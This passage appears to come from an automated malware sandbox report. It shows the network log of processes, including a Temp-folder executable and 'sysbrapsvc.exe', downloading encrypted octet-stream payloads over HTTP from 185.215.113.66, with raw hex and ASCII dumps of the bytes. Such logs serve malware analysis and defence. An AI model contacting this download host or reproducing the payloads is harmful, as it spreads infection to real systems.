                                                                              May 8, 2024 15:25:34.385186911 CEST1289INData Raw: cc c0 d5 f6 76 58 dc 93 86 0a 7a 73 31 1b 86 f2 99 0b 0a c3 29 1f 18 eb 34 62 30 4f 97 68 7a a7 2b e4 dc 7f 15 02 1c 92 a5 dc 04 bc d8 80 89 c1 7d 31 8d cc 5e 00 3e d9 dd 36 a0 29 2a e4 f0 03 d2 9f fb 5e 89 a7 a8 88 0c db 7f 02 b8 4c 9a 20 b8 99
                                                                              Data Ascii: vXzs1)4b0Ohz+}1^>6)*^L hJL3j104-D.0(C"krOB/Wye(m?hH/"'>X,0Yv*Mhl,]=.R~RO.qS5T{U
                                                                              May 8, 2024 15:25:34.385214090 CEST1289INData Raw: 19 89 96 e9 56 0f 9a 8c 19 b7 05 b4 27 39 21 25 b2 29 35 03 7e f7 f4 ad 75 ff 9f e3 00 20 68 f1 05 5f ae 80 44 41 3a 4f 23 2f d7 4a 79 1a 22 03 77 bd b2 c1 38 a8 21 72 fd 82 f9 23 8d bb de 86 5e 3b f3 ee 08 66 59 00 6d a4 13 79 80 f3 31 29 63 8f
                                                                              Data Ascii: V'9!%)5~u h_DA:O#/Jy"w8!r#^;fYmy1)cWz=9pHjje,]GcDOB)9l)VWdRyl}$C^dC$#nK/tmd}#x,<f7#[e|/")UN+LG.ouX$Js=
                                                                              May 8, 2024 15:25:34.385229111 CEST1289INData Raw: b0 92 f6 3f 1d 3a a3 f2 72 e7 3c ab 2a 56 d3 0e 3d 84 af 84 17 ae fe f6 bf 04 fa eb a8 21 04 10 46 12 99 06 c0 53 db bb dc 0e e4 b2 22 b6 5c 5d 9c 7b 01 fa 03 3e 6e 9b 77 dc 88 bb 7a fb a2 03 db 1e 8b 86 87 65 f2 56 a1 a8 9b f0 68 45 e3 9b 87 f2
                                                                              Data Ascii: ?:r<*V=!FS"\]{>nwzeVhES#n1KBCiD]p(Eqf$c&WhTos_49KJAZqRW'[LZE/+]RsLgQ_<OvqKKmL}:pfj^qh fW]
                                                                              May 8, 2024 15:25:34.726495028 CEST1289INData Raw: ae 13 d9 3c 80 95 1b 13 9e 3f c9 4c 70 f0 19 fc 72 a9 9d 72 9d 76 2d af 9d 78 f3 f8 ea f0 1a 30 30 f2 bc d5 d3 68 75 96 42 e1 16 bf 93 0f ed bd b7 9c 3a 47 ce 12 12 56 20 bf 54 2c 55 54 a9 64 4b e6 87 6a 07 a1 d0 67 f7 7d 50 da fd f5 9c 78 6d fc
                                                                              Data Ascii: <?Lprrv-x00huB:GV T,UTdKjg}PxmZyo!DaH,1$DSP<*J2m-Fhr&:O(d?QhBQ<Mh_)p"b,~b[KWZ5f:Gz}j[6,gXiR6


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.849790185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:36.574939013 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:36.916764021 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:36 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:25:36.916779041 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:25:36.916794062 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:25:36.916894913 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:25:36.916908026 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:25:36.916920900 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:25:36.917057991 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:25:36.917071104 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.849791185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:36.746490955 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:37.087049007 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:36 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 8960
                                                                              Last-Modified: Mon, 06 May 2024 15:56:03 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638fd93-2300"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 6e 7d d2 5f ce 4a 45 f2 2e c8 0a 06 01 ad 79 a1 63 76 36 9c 33 9d 4c 75 74 4a ce 78 8a 3c ef f0 d5 e4 b0 26 52 79 67 45 ad 70 d3 3a 4b 36 01 0e c6 16 f8 71 c8 1a 6a e2 64 71 7e b1 1a b9 f6 f8 f9 38 23 3c 26 8e 19 a9 67 be 75 d4 b0 b3 ee 7e 56 8d c9 d6 b2 19 08 98 9c 62 5d 08 84 18 e0 a4 81 52 52 f1 22 2d 57 91 35 b1 be bf 00 34 54 15 7a 9f 37 5a 41 a7 67 fd f5 f0 19 bc cb 4d 5d 3b 33 55 47 d7 29 48 84 09 d2 35 61 aa 27 75 84 62 9b 91 c9 fc d8 ab f6 d3 13 57 89 3f 95 ab 64 63 e7 73 c5 5e 05 a5 42 e3 0f 60 42 17 f5 88 3b 8c 25 27 7a 85 fa 04 37 4a f5 68 71 6d 2b 8a 84 61 c2 56 01 36 4f f4 55 cc fc 6b ff 18 a6 02 24 ce 28 d3 a3 ee 8d ef d1 4b 66 64 4b 50 7b ae d7 0c db 98 be e6 d7 4d 22 0d 84 e4 73 47 48 6f f3 f6 ce cb 17 4c 5d f2 e4 99 c3 e4 ef b5 2d 3d 28 e3 2f c2 fc a5 dc 8a c6 15 02 ae 33 6c f0 40 61 05 5b 9c 9f a9 81 6f 78 43 b8 d7 ca 55 ea 3c 2d c6 35 ea e5 78 8b 82 f5 67 d9 dc eb 87 ef 5c 2a 3d 82 67 a4 20 42 ba a1 a9 6e 52 5a b2 74 d1 ff 58 7d 97 69 5f d5 2e dd 2d 9b 94 06 26 3a 55 d4 63 0c 97 [TRUNCATED]
                                                                              Data Ascii: n}_JE.ycv63LutJx<&RygEp:K6qjdq~8#<&gu~Vb]RR"-W54Tz7ZAgM];3UG)H5a'ubW?dcs^B`B;%'z7Jhqm+aV6OUk$(KfdKP{M"sGHoL]-=(/3l@a[oxCU<-5xg\*=g BnRZtX}i_.-&:UcRSTud^3n<YyiiIetwjEJIe9n[~RTz~-g eKqBga-2bgeG\Kk-M5668Gjj+N<"AY<A0PMXZdlLPVevy2lHS2>Nn<p5q7Rpet \w\3]OzWt\<7$Z/BNeoq#q4V5r0%)-`9u%:oF8Li~}WJ3VV0}4tVT[O+27Gt!rn<DI3KI=0FlLW~^'.Am~U<lab+GIJrKEf`.0t}0^"q';1q1?n=*:NOrsGDjw_Hi`DkkHjAfi\&y57v~$~H [TRUNCATED]
                                                                              May 8, 2024 15:25:37.087101936 CEST1289INData Raw: f7 94 da 7b e6 b6 fe 0f a6 64 19 c2 ef 0c 25 ba 8a dc 2e e0 30 f4 54 50 75 d1 a6 f4 59 1c b4 b9 d6 5d ff c8 5e 3e 5b 07 7a 96 73 9b ae 22 d8 6b 94 c6 57 3e d8 71 a6 7b 47 b5 fd bf db f8 4c d1 a0 dc 40 6d 3e 69 9d 81 d1 0a 59 7c bc 21 67 cc 11 6c
                                                                              Data Ascii: {d%.0TPuY]^>[zs"kW>q{GL@m>iY|!gl.8D4JG?x/\@D;=(-Z!fH^;7|+$=zzC-dyfm3UW:eZP}c\i[^]:_((<E26+W]
                                                                              May 8, 2024 15:25:37.087224960 CEST1289INData Raw: 36 b6 60 d6 42 d5 be b8 10 0f 5e 53 6b 05 0c bb e0 3a fd c1 4c da c6 b2 ce 72 f2 28 ff e2 e4 db da 87 14 d0 4f 41 0e 55 57 fa be d2 25 4d 12 33 a4 70 68 6c 6c 2b a3 44 06 79 cc 95 93 eb 72 2a b2 f0 3b de cd b0 3a c3 dc 34 b8 c3 7d 7f 3e 04 b4 75
                                                                              Data Ascii: 6`B^Sk:Lr(OAUW%M3phll+Dyr*;:4}>u)xA*r\IAc:X1v".&9>^Q!4D "Ifh`(^+O1YPMZk(*x6nsclZ28_o0 k@!HuyA
                                                                              May 8, 2024 15:25:37.087462902 CEST1289INData Raw: 93 f1 1e 94 53 39 c9 d2 e2 09 21 6e 04 82 7e 50 d7 b3 b4 7a 0f 0c 6e f7 f3 72 9f 81 e7 4f 18 63 7d f3 82 53 8a c0 24 d3 f8 5f e5 bf 54 41 82 a4 fd fd 43 2d f5 13 2e c4 5b 9d f3 91 c6 f4 2e 55 bd e6 d6 75 a2 c3 d0 94 74 c8 cb 28 b6 dc f0 93 b5 29
                                                                              Data Ascii: S9!n~PznrOc}S$_TAC-.[.Uut()w~oLYj=e|qRaf;\o*FsJUS~T,om^&)Nh0/(Fy0qC4AOPp/iP?b4k"/8:V,p#$S=+
                                                                              May 8, 2024 15:25:37.087486982 CEST1289INData Raw: 33 51 0b bf 02 90 7d ae a0 4a f2 d7 4e 24 7a af 58 7f 8c 57 b1 0b ba f7 ad e3 5e a3 5c e2 17 41 70 26 55 dd e1 15 18 42 00 13 72 95 8a e6 0e bd 09 e1 cc 12 1d 94 48 d8 7f 9a a1 3a f8 a8 cd 4e 93 44 96 32 4d c1 d3 0f 72 e9 7c 3f f8 63 58 4c c1 64
                                                                              Data Ascii: 3Q}JN$zXW^\Ap&UBrH:ND2Mr|?cXLdydQ]X4&S{81eJE0]'k?mvv@Z|Bm9+7qd=Sf&x5h_VS>i2J(I-#$4V0
                                                                              May 8, 2024 15:25:37.087502003 CEST1289INData Raw: 75 f2 a4 6e 8c 81 1a ce 92 da 4e 55 fe 12 bc 9a 1d 07 16 a6 2c bb f4 14 e5 47 0e 5a ef 01 75 2d ca 7b 4a 24 d7 7f 58 3b f8 05 9d ad 36 f6 0e 9b 79 24 3d a3 86 9b 25 40 e7 93 e1 8a 71 37 ce 6a e1 85 1b d8 41 0b 62 b1 13 8e f5 76 e9 fe 55 d1 d5 ad
                                                                              Data Ascii: unNU,GZu-{J$X;6y$=%@q7jAbvU#i=a=7C(qPt]*:u0-/G3n~ulB41Q*txp{-M*u8H_8`<,d(,r*h8zG30J<W@zb
                                                                              May 8, 2024 15:25:37.087527990 CEST1289INData Raw: 22 8e fe 4a ef 62 4e fb 52 d3 10 f6 27 c8 5a 0d 9d 1d 25 85 59 6d 73 a2 2f f1 99 3c 63 a3 86 05 ed 4f 9d 19 fc 5b 79 4c 9c 5d b0 b8 13 8f c1 7b f3 b0 4b c7 c7 1a 66 c4 e8 67 59 56 e9 a8 38 19 67 57 78 8a eb f9 39 3e 92 c1 ed 14 f1 fe 1f 11 e3 ac
                                                                              Data Ascii: "JbNR'Z%Yms/<cO[yL]{KfgYV8gWx9>_tM~Q^>%\-WTTNzroS5]j9G$J,)govS8}BeW9kF,};P.2AE$!t`Gnx\pB
                                                                              May 8, 2024 15:25:37.087543964 CEST201INData Raw: 81 31 21 d8 8e 36 78 b3 2d 82 77 69 8a df 7e 62 18 45 06 17 54 88 d6 0a 13 39 f8 83 01 5f 60 e5 2f e2 a3 e1 ad 97 41 c3 f3 ff 04 87 45 be a8 6c b3 32 c4 02 f6 a3 27 6b b3 e7 12 44 a7 58 da 60 98 22 14 cc 06 3f 84 e5 8b 84 0c 98 a8 be 53 a5 2f 6a
                                                                              Data Ascii: 1!6x-wi~bET9_`/AEl2'kDX`"?S/jeUA?bkXwY;HzObN6<2%8bp2ePK1f:Kd$\kvjZz,{


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.849792185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:39.337002993 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:39.677988052 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:39 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:25:39.678095102 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:25:39.678167105 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:25:39.678183079 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:25:39.678198099 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:25:39.678260088 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:25:39.678329945 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:25:39.678381920 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              51192.168.2.849793185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:39.484021902 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:39.822788954 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:39 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 11520
                                                                              Last-Modified: Sat, 04 May 2024 13:18:06 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6636358e-2d00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 87 c5 d8 f7 ce 18 [TRUNCATED]
